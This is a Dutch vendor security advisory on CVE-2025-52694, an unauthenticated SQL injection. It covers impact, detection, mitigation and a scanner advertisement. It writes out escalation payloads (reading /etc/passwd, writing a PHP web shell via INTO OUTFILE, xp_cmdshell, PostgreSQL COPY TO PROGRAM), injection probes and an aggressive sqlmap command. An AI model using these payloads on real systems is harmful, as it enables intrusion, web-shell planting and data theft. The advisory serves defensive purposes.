剣 KENSAI

CVE-2025-52694: Niet-geauthenticeerde SQL Injectie Maakt Willekeurige Commando-uitvoering Mogelijk

12 januari 2026 10 min leestijd beveiliging

Kort samengevat: Een SQL-injectiekwetsbaarheid waarvoor geen authenticatie nodig is, stelt externe aanvallers in staat willekeurige SQL-commando's uit te voeren op kwetsbare internet-blootgestelde diensten, wat de vertrouwelijkheid, integriteit en beschikbaarheid van data bedreigt. CVSS 10.0.

CVSS 10.0 — KRITIEK

VeldDetail
CVE IDCVE-2025-52694
ErnstKRITIEK (CVSS 3.1: 10.0)
Type kwetsbaarheidSQL Injectie (CWE-89)
Gepubliceerd12 januari 2026
Authenticatie vereistGeen
AanvalsvectorNetwerk (internetgericht)

Wat is CVE-2025-52694?

CVE-2025-52694 is een kritieke SQL-injectiekwetsbaarheid in een internet-blootgestelde dienst die geen authenticatie vereist om te exploiteren. Aanvallers kunnen willekeurige SQL-commando's rechtstreeks in de databasequery's van de kwetsbare dienst injecteren, waardoor mogelijk alle databasegegevens gelezen of gewijzigd kunnen worden en — afhankelijk van de databaseconfiguratie — remote code execution op de onderliggende server bereikt kan worden.

SQL-injectie staat sinds het begin in de OWASP Top 10 en blijft verwoestend effectief wanneer aanwezig. Een niet-geauthenticeerde, via het netwerk toegankelijke SQL-injectie met volledige datatoegang behoort tot de gevaarlijkste kwetsbaarheden die er zijn — vandaar de maximale CVSS-score.

Technische impact

⚠ Volledige compromittering van de CIA-triade

Vertrouwelijkheid: alle databasegegevens leesbaar — gebruikersnamen, wachtwoorden, persoonsgegevens, API-sleutels, financiële data.
Integriteit: datawijziging, verwijdering van records, schemawijziging mogelijk.
Beschikbaarheid: DoS-aanvallen via resource-uitputtende query's; datavernietiging mogelijk.

Escalatiepad van SQL-injectie naar RCE

Op databases met uitgebreide functionaliteit ingeschakeld kan SQL-injectie escaleren naar uitvoering van besturingssysteemcommando's:

-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');

-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';

-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';

-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
  DECLARE result text;
  BEGIN
    EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
    RETURN result;
  END;
$$ LANGUAGE plpgsql;

Getroffen versies

Raadpleeg het leveranciersadvies voor specifieke product- en versie-informatie. Elke versie die als getroffen wordt vermeld en aan internetverkeer is blootgesteld, moet als actief exploiteerbaar worden behandeld. Werk onmiddellijk bij naar door de leverancier geleverde gepatchte versies.

Detectiemethoden

Handmatig testen op SQL-injectie

# Basic error-based detection
# Append ' to parameters and observe error responses
GET /search?q=test' HTTP/1.1

# Boolean-based blind detection
GET /search?q=test' AND 1=1-- -   # Should return normal results
GET /search?q=test' AND 1=2-- -   # Should return empty/different results

# Time-based blind detection (confirm injection)
GET /search?q=test'; WAITFOR DELAY '0:0:5'-- -   # MSSQL
GET /search?q=test'; SELECT SLEEP(5)-- -          # MySQL

# Use SQLMap for automated exploitation confirmation (authorized testing only)
sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs

WAF-logcontrole

Controleer uw WAF- of applicatielogs op patronen met SQL-trefwoorden (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) in verzoekparameters. Actieve exploitatie van CVE-2025-52694 zal deze patronen tonen.

🔍 KENSAI-detectie: De SQL Injection Scanner van KENSAI dekt error-based, blind, time-based en out-of-band injectietechnieken. CVE-2025-52694-injectiepatronen zijn opgenomen in onze payloadbibliotheek en worden gematcht tegen alle invoervectoren, inclusief parameters, headers en JSON/XML-body-velden.

Mitigatiestappen

  1. Pas onmiddellijk de leverancierspatch toe: werk bij naar de gepatchte versie zoals gespecificeerd in het leveranciersadvies.
  2. Geparametriseerde query's: zorg dat alle databasequery's prepared statements met geparametriseerde invoer gebruiken — de enige betrouwbare oplossing voor SQL-injectie.
  3. Invoervalidatie: valideer en saneer alle door gebruikers aangeleverde invoer en weiger SQL-metatekens waar niet nodig.
  4. Minimale rechten: databaseaccounts moeten minimale vereiste rechten hebben — nooit sa- of root-databasetoegang vanuit applicatieaccounts.
  5. WAF-regels: implementeer of werk WAF-regels bij om SQL-injectiepayloads te detecteren en te blokkeren — dit is een compenserende maatregel, geen oplossing.
  6. Schakel gevaarlijke stored procedures uit: schakel xp_cmdshell en andere OS-niveau databasefuncties uit tenzij expliciet vereist.
  7. Netwerksegmentatie: databaseservers mogen nooit rechtstreeks vanaf internet toegankelijk zijn.

KENSAI-detectiemogelijkheden

KENSAI biedt uitgebreide SQL-injectiedetectie, waaronder CVE-2025-52694:

SQL-injectie in uw stack?

KENSAI scant uw volledige webapplicatie-aanvalsoppervlak op SQL-injectie en 200+ andere kritieke kwetsbaarheden. Laat een SQL-injectie geen inbreuk worden.

Scan gratis op SQL-injectie